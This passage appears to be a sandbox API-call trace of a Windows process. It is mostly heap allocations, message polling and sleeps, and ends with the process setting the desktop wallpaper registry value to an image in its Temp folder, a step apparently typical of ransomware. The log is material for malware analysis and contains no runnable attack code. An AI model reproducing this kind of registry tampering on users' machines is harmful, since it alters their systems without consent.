hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0243.778] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0243.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0243.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0243.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0243.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0243.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0243.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0243.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0243.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0243.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0243.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0243.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0243.779] timeGetTime () returned 0x117cd9e [0243.779] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.779] Sleep (dwMilliseconds=0xa) [0243.816] timeGetTime () returned 0x117cdcd [0243.816] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.816] Sleep (dwMilliseconds=0xa) [0243.863] timeGetTime () returned 0x117cdfc [0243.863] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.863] Sleep (dwMilliseconds=0xa) [0243.909] timeGetTime () returned 0x117ce2a [0243.910] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.910] Sleep (dwMilliseconds=0xa) [0243.931] timeGetTime () returned 0x117ce3a [0243.931] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.931] Sleep (dwMilliseconds=0xa) [0243.956] timeGetTime () returned 0x117ce59 [0243.956] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.956] Sleep (dwMilliseconds=0xa) [0243.976] timeGetTime () returned 0x117ce69 [0243.976] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.976] Sleep (dwMilliseconds=0xa) [0243.999] timeGetTime () returned 0x117ce79 [0243.999] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0243.999] Sleep (dwMilliseconds=0xa) [0244.019] timeGetTime () returned 0x117ce98 [0244.019] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.019] Sleep (dwMilliseconds=0xa) [0244.034] timeGetTime () returned 0x117cea7 [0244.034] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.034] Sleep (dwMilliseconds=0xa) [0244.057] timeGetTime () returned 0x117ceb7 [0244.057] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.057] Sleep (dwMilliseconds=0xa) [0244.082] timeGetTime () returned 0x117ced6 [0244.082] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.082] Sleep (dwMilliseconds=0xa) [0244.107] timeGetTime () returned 0x117cee6 [0244.107] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.107] Sleep (dwMilliseconds=0xa) [0244.132] timeGetTime () returned 0x117cf05 [0244.134] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.134] Sleep (dwMilliseconds=0xa) [0244.159] timeGetTime () returned 0x117cf24 [0244.159] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.159] Sleep (dwMilliseconds=0xa) [0244.175] timeGetTime () returned 0x117cf34 [0244.175] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.175] Sleep (dwMilliseconds=0xa) [0244.225] timeGetTime () returned 0x117cf63 [0244.225] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0244.225] TranslateMessage (lpMsg=0x8cf798) returned 0 [0244.225] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0244.225] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0244.225] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0244.225] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.225] Sleep (dwMilliseconds=0xa) [0244.308] timeGetTime () returned 0x117cfb1 [0244.308] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.308] Sleep (dwMilliseconds=0xa) [0244.332] timeGetTime () returned 0x117cfd0 [0244.332] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.332] Sleep (dwMilliseconds=0xa) [0244.380] timeGetTime () returned 0x117cfff [0244.380] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.380] Sleep (dwMilliseconds=0xa) [0244.406] timeGetTime () returned 0x117d00f [0244.406] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.411] Sleep (dwMilliseconds=0xa) [0244.468] timeGetTime () returned 0x117d04e [0244.468] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.468] Sleep (dwMilliseconds=0xa) [0244.489] timeGetTime () returned 0x117d06d [0244.489] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.489] Sleep (dwMilliseconds=0xa) [0244.535] timeGetTime () returned 0x117d09c [0244.535] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.535] Sleep (dwMilliseconds=0xa) [0244.591] timeGetTime () returned 0x117d0d4 [0244.591] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.591] Sleep (dwMilliseconds=0xa) [0244.631] timeGetTime () returned 0x117d0f0 [0244.631] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.631] Sleep (dwMilliseconds=0xa) [0244.680] timeGetTime () returned 0x117d11f [0244.680] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.680] Sleep (dwMilliseconds=0xa) [0244.698] timeGetTime () returned 0x117d13f [0244.698] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.698] Sleep (dwMilliseconds=0xa) [0244.713] timeGetTime () returned 0x117d14e [0244.713] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.713] Sleep (dwMilliseconds=0xa) [0244.729] timeGetTime () returned 0x117d15e [0244.729] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.729] Sleep (dwMilliseconds=0xa) [0244.744] timeGetTime () returned 0x117d16d [0244.744] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.744] Sleep (dwMilliseconds=0xa) [0244.760] timeGetTime () returned 0x117d17d [0244.760] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0244.760] Sleep (dwMilliseconds=0xa) [0244.789] timeGetTime () returned 0x117d18d [0244.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0244.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0244.789] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0244.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0244.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0244.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0244.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0244.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0244.790] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0244.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab710 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0244.790] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0244.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0244.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0244.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0244.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0244.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0244.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0244.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0244.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0244.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0244.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0244.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0244.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0244.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0244.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0244.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0244.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0244.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0244.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0244.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a735a0 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0244.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0244.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0244.792] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0244.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0244.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0244.792] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0244.792] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0244.792] RegCloseKey (hKey=0x4e0) returned 0x0 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a735a0 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0244.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0244.793] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0244.793] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0244.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72368 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0244.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0244.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0244.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0244.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0244.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0244.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab470 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0244.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0244.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab458 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab668 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0244.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0244.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0244.794] 